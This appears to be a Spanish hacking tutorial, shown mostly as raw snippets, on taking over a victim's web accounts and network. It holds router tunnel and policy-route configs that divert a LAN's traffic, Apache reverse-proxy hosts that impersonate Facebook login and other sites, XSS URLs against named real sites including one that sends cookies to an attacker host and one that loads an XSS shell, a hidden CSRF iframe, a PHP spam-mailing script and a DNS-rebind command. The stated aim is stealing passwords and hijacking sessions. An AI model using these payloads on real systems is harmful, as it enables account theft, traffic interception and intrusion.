“Si tienes acceso al router (a su configuración) y si es un router "majo" puedes hasta crear un túnel (incluso vpn) con otro router de internet... puedes hacer pasar TODO el tráfico de esa lan por tu ordenador (tu sabrás lo que haces luego con eso) y/o si configuras una vpn, pues eso... que como si estuvieses sentadito en esa red.….….”
$create l2tp tunnel config ifname l2t-0 localip 190.42.42.236 remoteip 88.6.15.2 localhostname RASCA remotehostname PICA start initiator remote
$create l2tp tunnel config ifname l2t-0 localip 88.6.15.2 remoteip 190.42.42.236 localhostname PICA remotehostname RASCA start initiator local
http/1.1 401 Unautorized.WWW-Autenticate: Basic realm=”Prestige 650H/HW-33”…
IP: 172.28.1.48 255.255.255.0IP Interna del Router: 172.28.1.10IP Pública del Router: 83.60.158.126
RED: 192.168.0.0 255.255.255.0IP interna del router: 192.168.0.1IP Pública del router: xxx.xxx.xxx.xxx (ya sabéis por qué no la pongo…)
interface Tunnel0 ip address 192.268.200.1 255.255.255.0 ip nat inside tunnel source 193.251.1.17 tunnel destination 86.32.4.51
access-list 166 permit ip any any
ip route 172.28.0.0 255.255.255.0 192.168.200.2
route-map enviar permit 10 match ip address 166 set ip next-hop 192.168.200.2
Interface FastEthernet1/0 ip policy route-map enviar
enable secret $1$NQhM$MN4.S9z5U3yKZXBiPa0Up0 username admin secret $1$NQhM$MN4.S9z5U3yKZXBiPa0Up0 no logging 192.168.1.88 no snmp-server community public RO no snmp-server community empresa RW no service password-recovery
<VirtualHost xxx.xxx.xxx.xxx:80> ServerAdmin [email protected] ServerName pepito.com ServerAlias www.pepito.com ProxyPass / http://www.manolo.com/ ProxyPassReverse / http://www.manolo.com/</VirtualHost>
<VirtualHost xxx.xxx.xxx.xxx:80> ServerAdmin [email protected] ServerName ana.com ServerAlias www.ana.com ProxyPass / http://www.maripili.com/ ProxyPassReverse / http://www.maripili.com/</VirtualHost>
<VirtualHost gamberros.com:8080> ServerAdmin [email protected] ServerName gamberros.com ServerAlias www.gamberros.com ProxyPass / http://www.chicosbuenos.com:80/ ProxyPassReverse / http://www.chicosbuenos.com:80/</VirtualHost>
NameVirtualHost www.facebook.com<VirtualHost www.facebook.com:80> ..... ..... ServerAlias www.facebook.com ProxyPass / http://www.lo-que-sea.com/ ProxyPassReverse / http://www.lo-que-sea.com/</VirtualHost>
NameVirtualHost login.facebook.com<VirtualHost login.facebook.com:443> ..... ..... ServerAlias login.facebook.com ProxyPass / https://www.lo-que-sea.com/ ProxyPassReverse / https://www.lo-que-sea.com/</VirtualHost>
IP Pública: 193.251.1.17IP’s Privadas: 192.168.1.x/24 (esto ciertamente no nos “interesa” en esta ocasión)DNS Primario: 86.32.4.51 (que es la ip pública del atacante)DNS Secundario y otros… cualquiera de los públicos de Internet. 195.235.113.3, 80.58.0.33, etc…
IP Pública: 86.32.4.51IP’s Privadas: 172.28.0.0/24Máquina atacante: 172.28.0.66 /24Puerta enlace: 172.28.0.254DNS’s: 195.235.113.3 80.58.0.33El Router del atacante hace NAT de los puertos 53 UDP, 80 y 443 TCP hacia la máquina del atacante (172.28.0.66)
NameVirtualHost *:80### Para WADALBERTIA Listen 0.0.0.0:80<VirtualHost *:80> ServerName http://www.wadalbertia.org ServerAlias http://www.wadalbertia.org ProxyPreserveHost On ProxyRequests Off <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://www.wadalbertia.org/ ProxyPassReverse / http://www.wadalbertia.org/ <Location /> Order allow,deny Allow from all </Location></VirtualHost>
## Para ADOBE<VirtualHost *:80> ServerName http://www.adobe.com ServerAlias http://www.adobe.com ProxyPreserveHost On ProxyRequests Off <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://www.adobe.com/ ProxyPassReverse / http://www.adobe.com/ <Location /> Order allow,deny Allow from all </Location></VirtualHost>
## Para FACEBOOK<VirtualHost *:80> ServerName http://www.facebook.com ServerAlias http://www.facebook.com ProxyPreserveHost On ProxyRequests Off <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://www.facebook.com/ ProxyPassReverse / http://www.facebook.com/ <Location /> Order allow,deny Allow from all </Location></VirtualHost>
RewriteEngine On RewriteRule ^(.+).extensión_que_se_reemplazará$ http://nueva_dirección_a_escribir/ruta/archivo.extensión
* No tenemos “control” directo del router y/o red víctima. * No podemos cambiar configuración alguna del equipo, router o red víctima. * No conocemos nada acerca de la configuración de la red víctima, sólo su ip pública.
* Conocemos que es “asiduo” de algún foro/blog/red social (en nuestros ejemplos serán Wadalbertia, Yahoo mail, Facebook y Footbag) * Conocemos su nick, cuenta de correo, nombre de usuario o similar.
* Intentaremos hacernos pasar por esos servidores/servicios con el objeto de: a.- Robar sus contraseñas b.- Suplantar la sesión activa c.- Controlar el navegador del cliente víctima
* Usaremos técnicas de: 1.- ProxyPass y ProxyPassReverse con apache 2.- Envío de correo o spam con ataques Cross Site Scripting Persistentes 3.- Cross Site Request Forgery (CSRF) 4.- Control del navegador y ejecución de comandos con XSS-Shell 5.- Secuestro de sesión http mediante túneles XSS 6.- Acceso a la Red local Víctima con Anti DNS pinnig y Rebind DNS
NameVirtualHost *:80Listen 0.0.0.0:80<VirtualHost *:80> ServerName http://www.wadalbertia.com ServerAlias http://www.wadalbertia.com ProxyPreserveHost off ProxyRequests off ProxyVia off <Proxy *> Order deny,allow llow from all </Proxy> ProxyPass / http://www.wadalbertia.org/ ProxyPassReverse / http://www.wadalbertia.org/ <Location />Order allow,denyAllow from all </Location></VirtualHost>
http://www.bankofireland.ie/site-search/htsearch?words=%3Cscript%3Ealert%28%22Diosz%20Esxiste!!!%22%29%3C%2Fscript%3E&Submit=GO
http://www.ejemplo.com/phpBB2/privmsg.php?mode=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%e2%80%99%68%74%74%70%3a%2f%2f%77%77%77%2e%61%74%61%63%61%6e%74%65%2e%63%6f%6d%2f%72%6f%62%61%2e%70%68%70%3d%e2%80%99%2b%64%6f%63%75%6d%65%6e%74%2e%6%6f%6f%6b%69%65%65%3b%3c%73%63%72%69%70%74%3e
http://www.ejemplo.com/phpBB2/privmsg.php?mode=”><script>alert(document.cookie);document.location.href=’http://www.atacante.com/roba.php=’+document.cookiee;<script>
http://vmthor.site50.net/miblog2/pagina.php?param=Wadalbertia
Contenido de archivo.txt = Wadalbertia
http://vmthor.site50.net/miblog2/pagina.php?param=”Wadalbertia”
Contenido de archivo.txt="Wadalbertia"
?param=<script>alert(“Dios Existe!!!”)</script>
<html><object width="425" height="344"> <param name="movie" value="[youtube]http://www.youtube.com/v/h4y3cfJESzw?hl=es&[/youtube]fs=1"></param> <param name="allowFullScreen" value="true"></param> <param name="allowscriptaccess" value="always"></param> <embed src="[youtube]http://www.youtube.com/v/h4y3cfJESzw?hl=es&[/youtube]fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"> </embed></object><iframe src="https://login.yahoo.com/config/login?logout=1" width="0" height="0"></iframe></html>
$service_port = getservbyname('www', 'tcp');$address = gethostbyname('de.mc249.mail.yahoo.com');$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);if ($socket === false) { echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "";} else { echo "OK.";}echo "Intentando conectar con... '$address' on port '$service_port'...";$result = socket_connect($socket, $address, $service_port);if ($result === false) { echo "socket_connect() failed.Reason: ($result) " . socket_strerror(socket_last_error($socket)) . "";} else { echo "OK.<br><br>";}$in = 'AQUI SE PEGAN LAS CABECERAS DEL MAIL!!!!!';// ESTA LINEA ES IMPORTANTE!!!$in .= "Connection: Close"; echo "Enviando peticiones HTTP...";socket_write($socket, $in, strlen($in));echo "OK.<br><br>";echo "Cerrando Sockets...";socket_close($socket);echo "OK.<br><br>";echo "<h3>ENVIADO!!!!</h3><br><br>";?>
<?php$service_port = getservbyname('www', 'tcp');$address = gethostbyname('de.mc249.mail.yahoo.com');$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$result = socket_connect($socket, $address, $service_port);$in = 'CABECERAS DEL MAIL';$in .= "Connection: Close"; $i=0;// ENVIAR 10 CORREOS!!!while ($i<10) {socket_write($socket, $in, strlen($in));sleep(1);$i++;}socket_close($socket);?>
<html><iframe src="http://vmthor.site50.net/mail/embudo.php" width=0 height=0 </iframe></html>
<%Response.Write Server.MapPath(".")%>
http://www.footbag.org/forum/faq.php?faq[0][0]=<script>alert(“Dios Existe!!!”)</script>
http://www.footbag.org/forum/faq.php?faq[0][0]=<script>alert(DiosExiste!!!)</script>
http://www.footbag.org/forum/faq.php?faq[0][0]= <script src="http://free.7host05.com/verolulu/XSS/xssshell.asp"></script>
<html><object width="960" height="745"> <param name="movie" value="[youtube]http://www.youtube.com/v/pNtrQnbO9yM?fs=1&[/youtube]amp;hl=es_ES"></param> <param name="allowFullScreen" value="true"></param> <param name="allowscriptaccess" value="always"></param> <embed src="[youtube]http://www.youtube.com/v/pNtrQnbO9yM?fs=1&[/youtube]amp;hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="300"> </embed></object><iframe src="http://www.footbag.org/forum/faq.php?faq[0][0]=<script src='http://free.7host05.com/verolulu/XSS/xssshell.asp'></script>" width=0 height=0 </iframe></html>
http://vmthor.site50.net/footbag/videofootbag.html
./rebind –d amarasadios.com –i eth0 –t 193.251.1.17 –u'' –a'' –n 1000
-d nombre dominio del atacante-i interface por donde trabajará rebind-t dirección ip del objetivo-u'' nombre usuario (p.e. en un router ‘estándar’ 1234, admin., etc..)-a'' contraseña (idem de lo anterior)-n milisegundos del TTL